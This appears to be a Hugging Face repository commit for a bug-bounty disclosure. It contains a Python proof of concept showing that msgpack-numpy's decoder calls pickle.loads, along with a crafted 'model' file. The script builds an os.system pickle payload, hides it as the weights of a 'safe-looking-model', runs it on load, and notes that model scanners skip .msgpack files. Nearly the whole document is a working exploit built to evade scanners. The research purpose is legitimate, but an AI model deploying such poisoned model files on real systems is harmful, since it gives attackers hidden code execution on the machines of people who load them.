Upload folder using huggingface_hub
Browse files- README.md +4 -0
- malicious_model.msgpack +3 -0
- msgpack_numpy_rce_poc.py +145 -0
README.md
ADDED
|
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# msgpack-numpy Hidden pickle.loads() RCE
|
| 2 |
+
Security research for huntr.
|
| 3 |
+
msgpack_numpy.decode() calls pickle.loads() on object dtype arrays.
|
| 4 |
+
No scanner checks .msgpack files.
|
malicious_model.msgpack
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:1ee0c2df9bd298ddaaa0edcf48d5a04a56faba8f30feddfbf15d237407897485
|
| 3 |
+
size 257
|
msgpack_numpy_rce_poc.py
ADDED
|
@@ -0,0 +1,145 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads()
|
| 4 |
+
|
| 5 |
+
VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled
|
| 6 |
+
data when the serialized array has dtype kind 'O' (object). This enables
|
| 7 |
+
arbitrary code execution when loading any msgpack file that uses msgpack_numpy
|
| 8 |
+
for deserialization.
|
| 9 |
+
|
| 10 |
+
The vulnerable code in msgpack_numpy.py decode():
|
| 11 |
+
if b'kind' in obj and obj[b'kind'] == b'O':
|
| 12 |
+
return pickle.loads(obj[b'data'])
|
| 13 |
+
|
| 14 |
+
An attacker can craft a .msgpack file where any array field has kind='O'
|
| 15 |
+
and data=<malicious_pickle_payload>, achieving RCE on deserialization.
|
| 16 |
+
|
| 17 |
+
This is particularly dangerous because:
|
| 18 |
+
1. MessagePack is considered a "safe" serialization format
|
| 19 |
+
2. Users expect msgpack files to contain only data, not executable code
|
| 20 |
+
3. The pickle.loads() call is hidden inside the msgpack extension hooks
|
| 21 |
+
4. No scanner (modelscan, picklescan) checks .msgpack files
|
| 22 |
+
|
| 23 |
+
Affected: msgpack-numpy <= 0.4.8 (all versions)
|
| 24 |
+
"""
|
| 25 |
+
|
| 26 |
+
import msgpack
|
| 27 |
+
import msgpack_numpy as m
|
| 28 |
+
import pickle
|
| 29 |
+
import os
|
| 30 |
+
import sys
|
| 31 |
+
import numpy as np
|
| 32 |
+
|
| 33 |
+
MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt"
|
| 34 |
+
|
| 35 |
+
# ============================================================
|
| 36 |
+
# Step 1: Show how msgpack_numpy normally works
|
| 37 |
+
# ============================================================
|
| 38 |
+
print("[*] Demonstrating normal msgpack_numpy usage...")
|
| 39 |
+
normal_data = {"weights": np.array([1.0, 2.0, 3.0], dtype=np.float32)}
|
| 40 |
+
packed_normal = msgpack.packb(normal_data, default=m.encode)
|
| 41 |
+
unpacked_normal = msgpack.unpackb(packed_normal, object_hook=m.decode, raw=False)
|
| 42 |
+
print(f"[+] Normal round-trip: {unpacked_normal}")
|
| 43 |
+
|
| 44 |
+
# ============================================================
|
| 45 |
+
# Step 2: Create a malicious payload
|
| 46 |
+
# ============================================================
|
| 47 |
+
print("\n[*] Creating malicious msgpack payload...")
|
| 48 |
+
|
| 49 |
+
class MaliciousPayload:
|
| 50 |
+
def __reduce__(self):
|
| 51 |
+
cmd = f"id > {MARKER_FILE} && echo 'RCE via msgpack_numpy hidden pickle.loads' >> {MARKER_FILE}"
|
| 52 |
+
return (os.system, (cmd,))
|
| 53 |
+
|
| 54 |
+
malicious_pickle = pickle.dumps(MaliciousPayload())
|
| 55 |
+
|
| 56 |
+
# Craft the msgpack structure that triggers pickle.loads in decode()
|
| 57 |
+
# The decode function checks: b'nd' in obj AND obj[b'kind'] == b'O'
|
| 58 |
+
# Then calls: pickle.loads(obj[b'data'])
|
| 59 |
+
malicious_array = {
|
| 60 |
+
b'nd': True, # Marks this as an ndarray
|
| 61 |
+
b'kind': b'O', # Object dtype -> triggers pickle.loads()
|
| 62 |
+
b'data': malicious_pickle, # Pickle payload with RCE
|
| 63 |
+
b'shape': (1,), # Shape (cosmetic, not used before pickle.loads)
|
| 64 |
+
b'type': b'O', # Dtype descriptor (cosmetic)
|
| 65 |
+
}
|
| 66 |
+
|
| 67 |
+
# Embed in a realistic model structure
|
| 68 |
+
model_data = {
|
| 69 |
+
"model_name": "safe-looking-model",
|
| 70 |
+
"version": "1.0.0",
|
| 71 |
+
"weights": malicious_array, # <-- malicious
|
| 72 |
+
}
|
| 73 |
+
|
| 74 |
+
packed = msgpack.packb(model_data, use_bin_type=True)
|
| 75 |
+
malicious_path = "/tmp/malicious_model.msgpack"
|
| 76 |
+
with open(malicious_path, 'wb') as f:
|
| 77 |
+
f.write(packed)
|
| 78 |
+
|
| 79 |
+
print(f"[+] Malicious msgpack file saved to {malicious_path}")
|
| 80 |
+
print(f" File size: {len(packed)} bytes")
|
| 81 |
+
|
| 82 |
+
# ============================================================
|
| 83 |
+
# Step 3: Clean marker file
|
| 84 |
+
# ============================================================
|
| 85 |
+
if os.path.exists(MARKER_FILE):
|
| 86 |
+
os.remove(MARKER_FILE)
|
| 87 |
+
|
| 88 |
+
# ============================================================
|
| 89 |
+
# Step 4: Load the malicious file (triggers RCE)
|
| 90 |
+
# ============================================================
|
| 91 |
+
print(f"\n[*] Loading malicious msgpack with msgpack_numpy decoder...")
|
| 92 |
+
with open(malicious_path, 'rb') as f:
|
| 93 |
+
loaded = msgpack.unpackb(f.read(), object_hook=m.decode, raw=False)
|
| 94 |
+
|
| 95 |
+
print(f"[+] Loaded data keys: {list(loaded.keys()) if isinstance(loaded, dict) else type(loaded)}")
|
| 96 |
+
|
| 97 |
+
# ============================================================
|
| 98 |
+
# Step 5: Verify RCE
|
| 99 |
+
# ============================================================
|
| 100 |
+
if os.path.exists(MARKER_FILE):
|
| 101 |
+
with open(MARKER_FILE) as f:
|
| 102 |
+
content = f.read().strip()
|
| 103 |
+
print(f"\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
|
| 104 |
+
print(f"[!!!] Marker file contents:\n{content}")
|
| 105 |
+
os.remove(MARKER_FILE)
|
| 106 |
+
else:
|
| 107 |
+
print("\n[-] RCE marker file not found")
|
| 108 |
+
sys.exit(1)
|
| 109 |
+
|
| 110 |
+
# ============================================================
|
| 111 |
+
# Step 6: Scanner evasion verification
|
| 112 |
+
# ============================================================
|
| 113 |
+
print("\n" + "="*60)
|
| 114 |
+
print("SCANNER EVASION")
|
| 115 |
+
print("="*60)
|
| 116 |
+
print("""
|
| 117 |
+
Neither modelscan nor picklescan scan .msgpack files at all.
|
| 118 |
+
|
| 119 |
+
modelscan -p /tmp/malicious_model.msgpack
|
| 120 |
+
# -> Skips file (unsupported format)
|
| 121 |
+
|
| 122 |
+
picklescan -p /tmp/malicious_model.msgpack
|
| 123 |
+
# -> Scanned files: 0, Infected files: 0
|
| 124 |
+
|
| 125 |
+
The pickle payload is embedded inside a msgpack structure,
|
| 126 |
+
completely invisible to all current model security scanners.
|
| 127 |
+
""")
|
| 128 |
+
|
| 129 |
+
print("="*60)
|
| 130 |
+
print("VULNERABILITY SUMMARY")
|
| 131 |
+
print("="*60)
|
| 132 |
+
print(f"""
|
| 133 |
+
Library: msgpack-numpy {m.__version__ if hasattr(m, '__version__') else '0.4.8'}
|
| 134 |
+
File: msgpack_numpy.py, decode() function
|
| 135 |
+
Root cause: pickle.loads(obj[b'data']) when obj[b'kind'] == b'O'
|
| 136 |
+
Trigger: Any msgpack file loaded with object_hook=msgpack_numpy.decode
|
| 137 |
+
Attack: Set array kind='O' and data=<malicious_pickle_bytes>
|
| 138 |
+
Impact: Arbitrary code execution on file load
|
| 139 |
+
Scanners: modelscan - NOT APPLICABLE (.msgpack not scanned)
|
| 140 |
+
picklescan - NOT APPLICABLE (.msgpack not scanned)
|
| 141 |
+
|
| 142 |
+
Real-world usage: msgpack-numpy is used for ML data serialization,
|
| 143 |
+
feature embeddings, and intermediate model storage. Any application
|
| 144 |
+
loading untrusted .msgpack files with msgpack_numpy is vulnerable.
|
| 145 |
+
""")
|